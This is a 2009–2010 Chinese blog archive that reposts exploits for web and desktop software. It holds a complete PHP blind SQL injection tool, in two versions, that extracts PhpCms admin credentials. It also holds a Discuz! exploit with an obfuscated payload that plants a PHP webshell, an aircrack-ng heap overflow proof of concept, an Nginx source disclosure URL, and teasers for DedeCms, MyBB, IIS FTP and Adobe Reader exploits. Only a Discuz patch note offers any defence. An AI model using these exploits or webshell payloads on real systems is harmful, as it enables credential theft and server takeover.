存档

‘矩阵毒刺’ 分类的存档

Nginx 0.8.35 Space Character Remote Source Disclosure

2010年5月31日 Chinadu 没有评论

#################################################################
# Application Info:
# Name: Nginx
# Tested on nginx 0.8.35
# Nginx 0.8.36 and higher is not vulnerable
#################################################################
# Vulnerability Info:
# Type: Remote File Disclosure
# Risk: High
#################################################################
# Vulnerability:
# http://localhost/file.php%20
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: whh_iran[at]securitylab.ir & info@securitylab[dot]ir
###################################################################

分类: 矩阵毒刺 标签:

PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

2010年5月8日 Chinadu 没有评论

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 1:

$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 2:

$query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 3:

$query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

$time_a = time();

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

$time_b = time();

fclose($conn);

//echo $time_b - $time_a."\r\n";

if ($time_b - $time_a > 4)

return true;

else

return false;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 0;

$chr = 0;

while ($exit==0)

{

if (exploit($hostname, $path, $pos, $chr, $chs))

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path)

{

echo "[+] prefix: ";

$conn = fsockopen($hostname, 80);

$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";

$request .= "Host: {$hostname}\r\n";

$request .= "Connection: Close\r\n\r\n";

fputs($conn, $request);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("Exploit failed");

}

?>

分类: 矩阵毒刺 标签: , ,

PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)

2010年5月8日 Chinadu 没有评论

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 0:

$query = "#";

break;

case 1:

$query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 2:

$query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 3:

$query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

//print_r($conn);

/*if (!$conn){

exit("\r\n[-] No response from $conn");

}*/

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

return $reply;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 1;

$chr = 0;

while ($exit==0)

{

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path, $chs)

{

echo "[+] prefix: ";

$pos = 0;

$chr = 0;

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match('/FROM `(.+)yp_product/ie',$response,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path, 0);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("\r\n[-] Exploit failed");

}

?>

分类: 矩阵毒刺 标签: , ,

Remote Exploit Against the Aircrack-NG Tools svn r1675

2010年4月15日 Chinadu 没有评论

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the

self-proclaimed length of a EAPOL-packet to be correct and never to exceed

a (arbitrary) maximum size of 256 bytes for packets that are part of the

EAPOL-authentication. We can exploit this by letting the code parse packets

which:

a) proclaim to be larger than they really are, possibly causing the code

to read from invalid memory locations while copying the packet;

b) really do exceed the maximum size allowed and overflow data structures

allocated on the heap, overwriting libc's allocation-related

structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-

path. Careful layout of the packet's content can even possibly alter the

instruction-flow through the already well known heap-corruption paths

in libc. Playing with the proclaimed length of the EAPOL-packet and the

size and content of the packet's padding immediately end up in various

assertion errors during calls to free(). This reveals the possibility to

gain control over $EIP.

Given that we have plenty of room for payload and that the tools are

usually executed with root-privileges, we should be able to have a

single-packet-own-everything exploit at our hands. As the attacker can

cause the various tools to do memory-allocations at his will (through

faking the appearance of previously unknown clients), the resulting

exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev

r238 to work. It generates pcap-file with single packet of the following

content:

0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0

108000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172

3F

03/27/2010, Lukas Lueg, lukas.lueg@gmail.com

'''

import cpyrit.pckttools

import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second

# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-

# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and

# struct WPA_hdsk.

# We have plenty of room for exploit-payload as most of the fields in the

# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent

# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in

# case of airodump-ng...

pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \

addr2='00:de:ad:c0:de:01', \

FCfield='to-DS') \

/ scapy.layers.dot11.LLC() \

/ scapy.layers.dot11.SNAP() \

/ scapy.layers.l2.EAPOL(len=65000) \

/ cpyrit.pckttools.EAPOL_Key() \

/ cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \

/ scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':

print "Packet's content:"

print ''.join("%02X" % ord(c) for c in str(pckt))

filename = 'aircrackng_exploit.cap'

print "Writing to '%s'" % filename

writer = cpyrit.pckttools.Dot11PacketWriter(filename)

writer.write(pckt)

writer.close()

print 'Done'

分类: 矩阵毒刺 标签: ,

DedeCms v5.5 0day

2010年3月10日 Chinadu 没有评论

官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马
密码t,官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志

阅读全文...

分类: 矩阵毒刺 标签: ,

MyBB 1.4 admin remote code execution vulnerability

2010年1月18日 Chinadu 没有评论

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下:

//index.php,336行左右

$plugins->run_hooks("index_end");
//出现了eval函数,注意参数
eval("$index = "".$templates->get("index")."";");
output_page($index);

看以下eval()函数中的内容是否可以控制,继续找到templates类查看get函数的定义:
阅读全文...

分类: 矩阵毒刺 标签:

discuz!7.1、7.2远程代码执行漏洞exploit

2010年1月7日 Chinadu 没有评论

1.注册一个新用户
2.Exp代码如下:

<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">

帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />

<input type="hidden" name="action" value="imme_binding" />

<input type="hidden" name="response[result]" value="1:2" />

<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).

chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).

chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).

chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).

chr(99).chr(104).chr(101).chr(47).chr(117).

chr(115).chr(101).chr(114).chr(103).chr(114).

chr(111).chr(117).chr(112).chr(95).chr(48).

chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).

chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).

chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).

chr(91).chr(99).chr(109).chr(100).chr(93).

chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />

<input type="submit" name="topicsubmit" value="提交" class="submit" />

</form>

chr解码后是:

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

保存html

打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd

第二种方法:

直接GET,利用语句:

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法:

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁:

http://www.discuz.net/thread-1537673-1-1.html

分类: 矩阵毒刺 标签: ,

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版

2009年9月20日 Chinadu 没有评论

绑定4444端口,Windows 2000 CN + SP4 测试通过,需要能建目录的用户,偏移地址若不通用,请自行修改。

阅读全文...

分类: 矩阵毒刺 标签: , ,

Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit

2009年9月4日 Chinadu 没有评论

#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#

http://www.coromputer.net/CVE-2009-0927_package.zip

back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

# milw0rm.com [2009-09-03]

分类: 矩阵毒刺 标签: ,

让 Windows 开机自动拨号上网

2009年9月4日 Chinadu 2 条评论

1. 将以下代码复制、粘贴到记事本
2. 把代码中的“宽带连接”修改为你建立的的拨号网络连接的名称,账号、密码分别修改为你的 ADSL 账号和密码
3. 将代码另存为:拨号.vbs,此时双击即可实现拨号
4. 把“拨号.vbs” 拖到开始菜单的启动项里
5. 完成。

阅读全文...

分类: 矩阵毒刺 标签: